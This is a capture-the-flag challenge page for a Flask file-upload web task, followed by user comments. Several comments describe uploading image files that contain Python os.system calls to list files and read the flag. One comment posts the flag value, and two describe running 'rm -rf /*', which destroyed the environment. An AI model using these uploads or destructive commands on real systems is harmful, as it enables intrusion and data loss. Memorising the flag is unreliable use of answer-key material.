Flask_FileUploadWEB 未解决
分数:
10
金币:
3
题目作者:
valecalida
一 血:
Lazzaro
一血奖励:
3金币
解 决:
12650
提 示:
描 述:
Flask_FileUpload
评分(20)
解题动态
anton_小金鱼 攻破了该题 1天前
cha8e1 攻破了该题 1天前
yehlg 攻破了该题 2天前
yu'c 攻破了该题 3天前
avaclaire 攻破了该题 3天前
Kernel1 攻破了该题 3天前
脚本gay 攻破了该题 3天前
YS_JW 攻破了该题 4天前
池屿 攻破了该题 4天前
wujita01 攻破了该题 5天前
hsk_zy 攻破了该题 5天前
zhuguangsen 攻破了该题 5天前
Hackerchen 攻破了该题 6天前
mmhhdm 攻破了该题 6天前
yangyy 攻破了该题 6天前
simple9527 攻破了该题 6天前
bugfuck2 攻破了该题 6天前
Motona_Sky 攻破了该题 7天前
kitniu 攻破了该题 9天前
评论
kygahd 3年前
举报
我的方法是, 首先建个test.jpg 文件, 内容是python代码 import os os.system('ls -la') 执行系统命令列出当前文件夹的所有文件 用burp上传以后返回的结果里发现当前文件夹有app.py. 然后修改test.jpg 为 import os os.system(“cat ./app.py”) 来查看网站源码。 源码里发现一段代码为 shell('ec
Epiphany777 3年前
举报
jpg\png python 抓包 import os os.system('cat /flag')
zuoqirun 3年前
举报
flag{1c6b553c3a91791993b859e1625275ac} rm -rf /*场景炸了
uzzzzz 3年前
举报
编写一个文件 test.py, 文件中的语句为: import os os.system('ls -lat ../') os.system('cat ../flag') 将文件名改成test.py.png, 在burpsuite中改包filename=test.png
ttxs25830 3年前
举报
草,我传了个rm -rf /* 上去,似乎没有都删掉,但是场景真炸了......
GH0S7 3年前
举报
hhhhhhhhhhhhhhhhhhhhhh
bracket 3年前
举报
oh.cool
maomaoha1 4年前
举报
Traceback (most recent call last) File "/usr/local/lib/python3.7/site-packages/flask/app.py", line 2464, in __call__ Open an interactive python shell in this framereturn self.wsgi_app(envi
chengzhang 4年前
举报
666
·w· 4年前
举报
我觉得好难啊
nauyx 4年前
举报
easy
泡椒控卫 4年前
举报
https://blog.csdn.net/m0_57954651/article/details/123335889?spm=1001.2014.3001.5501